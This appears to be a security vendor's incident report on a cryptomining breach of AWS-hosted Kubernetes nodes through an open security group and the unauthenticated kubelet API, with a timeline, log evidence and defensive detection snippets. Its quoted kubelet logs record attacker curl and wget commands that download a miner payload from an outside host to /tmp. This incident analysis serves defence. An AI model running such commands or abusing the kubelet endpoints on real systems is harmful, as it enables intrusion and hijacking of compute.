Alert Logic Container IDS Solution Detects Cryptomining Attack on AWS

Executive Summary

On April 4, 2018, an analyst in our SOC (security operations center) raised an incident for one of our newly provisioned customers, indicating they were hosting a cryptomining threat targeting the Monero cryptocurrency. The attack was identified via the threat detection capabilities of the beta version of our Alert Logic container intrusion detection system (IDS) solution for containerized environments, which had detected strings indicative of Monero mining activity passing across the network. A container within the customer environment had been breached before we provisioned the container solution, and was hosting this cryptominer.
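This style of detection can be illustrated with a minimal sketch: scanning network payloads for substrings characteristic of Monero mining traffic (such as the Stratum protocol login used by miners like XMRig). The indicator strings below are illustrative assumptions; the actual Alert Logic IDS signatures are proprietary and not shown here.

```python
# Minimal illustration of signature-based payload inspection.
# These indicator substrings are assumptions for illustration only;
# the real IDS signatures are not public.
MINING_INDICATORS = [
    b'"method":"login"',  # Stratum mining-protocol login message
    b'xmrig',             # XMRig miner user-agent string
    b'monero',
]

def payload_matches(payload: bytes) -> bool:
    """Return True if the payload contains any known mining indicator."""
    lowered = payload.lower()
    return any(indicator in lowered for indicator in MINING_INDICATORS)
```

A real IDS matches compiled signatures against reassembled streams at line rate; the sketch only conveys the idea that characteristic strings on the wire are enough to surface a miner.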

Our investigation determined that the exploit was achieved via a wget command, executed by an attacker in China (IP: 116.211.143.90), through an open AWS security group (0.0.0.0/0) that had been applied to the Kubernetes nodes in question. Kubernetes nodes exposed to the open internet in this way are known to have an unauthenticated RCE (remote code execution) capability, which was disclosed by external security researchers on March 13, 2018, in a blog post on Medium.

The AWS security group had been applied to the Kubernetes nodes as of February 22, 2018. Upon subsequent inspection of AWS CloudTrail logs, IDS events, and kubelet logs (internal Kubernetes logs) supplied by the customer to Alert Logic, we identified that at least four different nodes had been breached in the same way since the security group was applied:

  • Node 1 – April 3
  • Node 2 – March 8
  • Node 3 – March 8
  • Node 4 – April 4

Only the Node 1 and Node 4 security breaches in this chain were caught in real time, as these were the only nodes breached after our container IDS solution was provisioned. Nodes 2 and 3 were identified as having been breached previously using the historical logs supplied by the customer.

Using the logs available since February 22 for each node, we see repeated attempts to execute wget and curl commands, but these fail in all cases because the containers being targeted do not contain those commands. In each case the node was ultimately breached by exploiting an intermittently deployed container that had wget installed. Each time, the node was breached by the same Chinese IP (which posts back to a .ru address).

At present we have no reason to believe the attacker was able to gain more permanent or persistent access to the AWS account, and the remediation of closing the security group and deleting all Kubernetes nodes (completed late on April 4) is likely to have been sufficient to remove the detected threat.
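The root cause here, an ingress rule open to 0.0.0.0/0, is straightforward to audit for. As a hedged sketch (operating on the dictionary shape returned by the EC2 DescribeSecurityGroups API; this is an illustration, not Alert Logic tooling), a check for world-open ingress rules looks like:

```python
def open_ingress_rules(security_group: dict) -> list:
    """Return ingress rules in an EC2 security group that allow
    traffic from anywhere (0.0.0.0/0).

    `security_group` follows the shape of one entry from an EC2
    DescribeSecurityGroups response; illustrative only.
    """
    open_rules = []
    for rule in security_group.get("IpPermissions", []):
        for ip_range in rule.get("IpRanges", []):
            if ip_range.get("CidrIp") == "0.0.0.0/0":
                open_rules.append(rule)
                break
    return open_rules
```

Running a check like this across an account, and alerting when kubelet ports are among the open rules, would have flagged this misconfiguration on February 22 rather than after the breach.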

Timeline of the Cyber Attack

Date | Nodes Affected | Activity
Dec-20-2017 | Nodes 2, 3 and 4 | Created
Feb-13-2018 | n/a | Monero miner incident detection released by Alert Logic to customers
Feb-22-2018 | Nodes 2, 3 and 4 | Open security group applied to nodes in cluster
Mar-6-2018 | Node 3 | First scanning for open nodes observed; activity matches that later described in the Medium blog
Mar-7-2018 | Node 2 | First scanning for open nodes observed; activity matches that later described in the Medium blog
Mar-8-2018 (16:12:56) | Node 3 | Vulnerable pod started
Mar-8-2018 (16:12:57) | Node 2 | Vulnerable pod started
Mar-8-2018 (16:40:52) | Node 2 | Breached with miner; activity matches that later described in the Medium blog
Mar-8-2018 (16:40:55) | Node 3 | Breached with miner; activity matches that later described in the Medium blog
Mar-13-2018 | n/a | Medium blog released, in response to an observed Kubernetes breach
Mar-29-2018 | Node 1 | Created (inherits open security group)
Apr-3-2018 (15:42:07) | Node 1 | Vulnerable pod started
Apr-3-2018 (15:42:08) | Node 4 | Vulnerable pod started
Apr-3-2018 (19:37:10) | Node 1 | Breached with miner; activity matches that described in the Medium blog
Apr-3-2018 (19:37:16) | Node 1 (inferred) | Incident raised to SOC; linked to Node 1 via the timestamp in the event
Apr-4-2018 (08:24:31) | Node 4 | Breached with miner; activity matches that described in the Medium blog
Apr-4-2018 (08:24:39) | Node 4 (inferred) | Incident raised to SOC; linked to Node 4 via the timestamp in the event

Evidence of the Security Breach

Recon

Reviewing the kubelet logs from the point at which the security group was opened for the affected nodes, we were able to establish routine scanning activity beginning March 6.

  • Mar  6 07:44:53 ip-172-20-59-158 kubelet[1223]: I0306 07:44:53.317031    1223 server.go:779] GET /runningpods: (21.334µs) 301 [[python-requests/2.7.0 CPython/2.7.9 Windows/2003Server] 222.186.21.69:1878]
  • Mar  6 07:44:53 ip-172-20-59-158 kubelet[1223]: I0306 07:44:53.592510    1223 server.go:779] GET /runningpods/: (2.770017ms) 200 [[python-requests/2.7.0 CPython/2.7.9 Windows/2003Server] 222.186.21.69:1878]

The logs in this instance show the request for runningpods: the first request receives a 301 redirect to /runningpods/, and the follow-up request succeeds with a 200 status code. We do not have any data on precisely what information was supplied to the attacker by these requests, but we do know it included the list of containers available on the host (as that is the function of the request).

This should be considered a successful information disclosure in each instance: Kubernetes is not expected to have this capability accessible to the open internet, because the endpoint is unauthenticated and no authentication is possible.
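To make the disclosure concrete, the /runningpods/ endpoint returns a standard Kubernetes PodList object, from which an attacker can trivially enumerate every namespace, pod, and container name on the node. A sketch of that parsing step (field names are the standard Kubernetes API ones; the sample data in the usage below is invented for illustration):

```python
import json

def list_containers(runningpods_json: str) -> list:
    """Extract (namespace, pod, container) tuples from a kubelet
    /runningpods/ response body (a Kubernetes PodList object)."""
    pods = json.loads(runningpods_json)
    found = []
    for pod in pods.get("items", []):
        meta = pod.get("metadata", {})
        for container in pod.get("spec", {}).get("containers", []):
            found.append((meta.get("namespace"), meta.get("name"),
                          container.get("name")))
    return found
```

This is exactly the target list an attacker needs before attempting command execution against each container in turn, which is what we observe in the next section.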

Key Aspects of the Breach

Once recon has identified the list of available containers, the attacker uses curl to attempt to execute commands on them. The logs demonstrating these attempts are below:

  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]
  • Apr  3 19:39:23 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50202]
  • Apr  3 19:39:30 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50284]
  • Apr  3 19:39:37 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50368]

Additional information from the error logs generated by these requests is shown below:

  • Apr  3 19:39:17 ip-172-20-87-182 dockerd[1369]: time="2018-04-03T19:39:17.666331830Z" level=error msg="Error running exec in container: rpc error: code = 2 desc = oci runtime error: exec failed: container_linux.go:247: starting container process caused \"exec: \\\"curl\\\": executable file not found in $PATH\"\n"
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: logging error output: "command 'curl hxxp://chrome.zer0day.ru:5050/mrx -o /tmp/kube.lock' exited with 126: "
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]

Note the error produced in the kubelet log identifying that the curl command is not available. This log indicates that the command was unsuccessful, but it does record the command being used. This command ties the attack to the Medium blog post, as it is functionally identical to the execution demonstrated there. In this instance, however, it was unsuccessful. We cannot know which container it was executed on, only that it was a container on Node 1.
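These "logging error output" lines are valuable precisely because they capture the attacker's exact command and its exit code. Extracting them at scale can be sketched with a regular expression tuned to the log excerpts above (kubelet log formats vary between versions, so treat the pattern as an assumption, not a general parser):

```python
import re

# Matches the attacker command recorded in kubelet "logging error output"
# lines, as seen in the excerpts above. Tuned to those samples; other
# kubelet versions may format these lines differently.
CMD_PATTERN = re.compile(
    r"logging error output: \"command '([^']+)' exited with (\d+)"
)

def extract_attempts(log_lines):
    """Yield (command, exit_code) pairs from kubelet log lines."""
    for line in log_lines:
        match = CMD_PATTERN.search(line)
        if match:
            yield match.group(1), int(match.group(2))
```

Run over the full log set, this recovers every attempted curl and wget invocation, which is how the repeated failed attempts since February 22 were enumerated.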

Upon successful execution, however, we see the following log message:

  • Apr  3 19:37:03 ip-172-20-87-182 kubelet[1232]: logging error output: "command 'wget  hxxp://chrome.zer0day.ru:5050/mrx --no-check-certificate -O /tmp/kube.lock' exited with 1: http://: Invalid host name.\n--2018-04-03 19:37:03--  hxxp://chrome.zer0day.ru:5050/mrx\nResolving chrome.zer0day.ru (chrome.zer0day.ru)... 185.10.68.225\nConnecting to chrome.zer0day.ru (chrome.zer0day.ru)|185.10.68.225|:5050... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1643 (1.6K) [application/octet-stream]\nSaving to: '/tmp/kube.lock'\n\n     0K .                                                     100% 2.05M=0.001s\n\n2018-04-03 19:37:03 (2.05 MB/s) - '/tmp/kube.lock' saved [1643/1643]\n\nFINISHED --2018-04-03 19:37:03--\nTotal wall clock time: 0.6s\nDownloaded: 1 files, 1.6K in 0.001s (2.05 MB/s)\n"
  • Apr  3 19:37:03 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:42696]

Curiously, the log from this container (from these logs alone we cannot know which container it was; we establish this by association later) indicates that the command failed due to an invalid hostname, yet it goes on to successfully download the script from the external host. It is unclear how the script can execute correctly while also generating an error, and it is pure fortune that this occurs: the error is the only reason the activity appears in the log at all. Had the command succeeded cleanly, we would have no evidence of it, as successful commands are not logged by default.

From this log alone, however, we can only establish that a successful wget was performed. We need the subsequent log messages to achieve container-level attribution:

  • Apr  3 19:37:10 ip-172-20-87-182 kubelet[1232]: I0403 19:37:10.660382    1232 server.go:779] POST /run/default/[container_specific_path]/[container_specific_path]: (36.851049ms) 200 [[curl/7.29.0] 116.211.143.90:42900]

Seven seconds after the successful wget that downloads a file (we discuss the file itself later), we see a POST request to a URI directed at the vulnerable container (redacted in the log above). This is also six seconds before the incident demonstrating the node breach is raised to the SOC. We cannot know what was executed in the POST body, as this data is not logged, but it is highly likely to have been execution of the cryptominer malware on the system. That execution then causes the initial external communications, which are caught by our IDS signatures and raise the incident. This is the basis for inferring that the vulnerable container specifically was breached, rather than some other container being breached and then used for lateral movement. Finding the malicious cryptominer on the vulnerable container itself was of course the cause of the incident, but we have now established that only and uniquely that one container was breached, and it is “patient zero” for a node in each case.
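The attribution logic just described, tying the successful wget to the POST /run request that follows it within seconds, amounts to a simple timestamp correlation. A sketch, assuming the syslog-style timestamps shown in the excerpts (which omit the year, so it must be supplied):

```python
from datetime import datetime, timedelta

def parse_ts(line: str, year: int = 2018) -> datetime:
    """Parse the leading syslog timestamp, e.g. 'Apr  3 19:37:10'."""
    return datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")

def correlate(wget_line: str, post_line: str,
              window_seconds: int = 30) -> bool:
    """True if the POST follows the wget within the window -- the basis
    for attributing the breach to that specific container."""
    delta = parse_ts(post_line) - parse_ts(wget_line)
    return timedelta(0) <= delta <= timedelta(seconds=window_seconds)
```

The 30-second window here is an arbitrary illustrative choice; in the incident the gap was seven seconds, well inside any reasonable correlation window.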

Payload / Cryptominer Analysis

Upon analysis of the cryptominer removed from one of the breached nodes, it was identified as a classic, unaltered version of XMRig. This version of the cryptominer was already known to Alert Logic Active Intelligence, and was the basis of the original research that produced the incident coverage released on February 13, 2018. The sample was also identical to the sample identified in the Medium blog.
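Confirming that a recovered sample is a known binary typically comes down to comparing cryptographic digests against an indicator list. A minimal sketch of that comparison (the "known" digest below is derived from placeholder bytes purely for illustration; the real IOC hashes for the XMRig sample are not reproduced here):

```python
import hashlib

# Placeholder digest for illustration only; not a real XMRig IOC hash.
KNOWN_MINER_SHA256 = hashlib.sha256(b"example xmrig sample").hexdigest()

def matches_known_sample(sample_bytes: bytes) -> bool:
    """Compare a recovered payload against the known-sample digest."""
    return hashlib.sha256(sample_bytes).hexdigest() == KNOWN_MINER_SHA256
```

An exact digest match is what justifies the "unaltered" claim; a repacked or modified miner would require fuzzy hashing or behavioural analysis instead.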

Additional Details about the Cyber Attack

Cryptominer restarts

Node 1 was breached on April 3, according to the log traffic below:

  • Apr  3 19:37:10 ip-172-20-87-182 kubelet[1232]: I0403 19:37:10.660382    1232 server.go:779] POST /run/default/[container_specific_path]/[container_specific_path]: (36.851049ms) 200 [[curl/7.29.0] 116.211.143.90:42900]
  • Apr  3 19:39:17 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50100]
  • Apr  3 19:39:23 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50202]
  • Apr  3 19:39:30 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50284]
  • Apr  3 19:39:37 ip-172-20-87-182 kubelet[1232]: [[curl/7.29.0] 116.211.143.90:50368]

Node 1 was killed on April 4, according to the log traffic below:

  • ./daemon.log:Apr 4 14:21:04 ip-172-20-87-182 kubelet[1232]: I0404 14:21:04.577373 1232 kubelet.go:1871] SyncLoop (PLEG): "[container_specific_path]_default([longID])", event: &pleg.PodLifecycleEvent{ID:"[longID]", Type:"ContainerDied", Data:"[data]"}

We see an immediate attempt by the attacking IP to restart the cryptominer again, based on the log traffic below:

  • Apr  4 14:21:04 ip-172-20-87-182 kubelet[1232]: I0404 14:21:04.169411    1232 server.go:779] POST /run/default/[container_specific_path]/[container_specific_path]: (18h43m47.638477556s) 200 [[curl/7.29.0] 116.211.143.90:43130]

So, within a second of the compromised cryptomining container being torn down, we see attempts from the attacking IP to restart it. It is likely that the teardown of the TCP connection itself signalled to the attacker that the miner was down; a poll-and-response cycle would likely take too long to explain the timestamps we can see.
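This restart behaviour suggests a simple detection heuristic: flag any POST /run request that lands within a short window of a ContainerDied event. A sketch, using the same syslog timestamp assumption as the excerpts above (window size is an illustrative choice):

```python
from datetime import datetime, timedelta

def parse_ts(line: str, year: int = 2018) -> datetime:
    """Parse the leading syslog timestamp, e.g. 'Apr  4 14:21:04'."""
    return datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")

def restart_attempts(log_lines, window_seconds: int = 5):
    """Return POST /run lines occurring within `window_seconds` of any
    ContainerDied event -- a heuristic for attacker restart behaviour."""
    died_times = [parse_ts(l) for l in log_lines if "ContainerDied" in l]
    hits = []
    for line in log_lines:
        if "POST /run/" in line:
            ts = parse_ts(line)
            if any(abs(ts - died) <= timedelta(seconds=window_seconds)
                   for died in died_times):
                hits.append(line)
    return hits
```

In this incident the gap was under a second, so even a very tight window would have flagged the restart attempt while producing few false positives from ordinary pod churn.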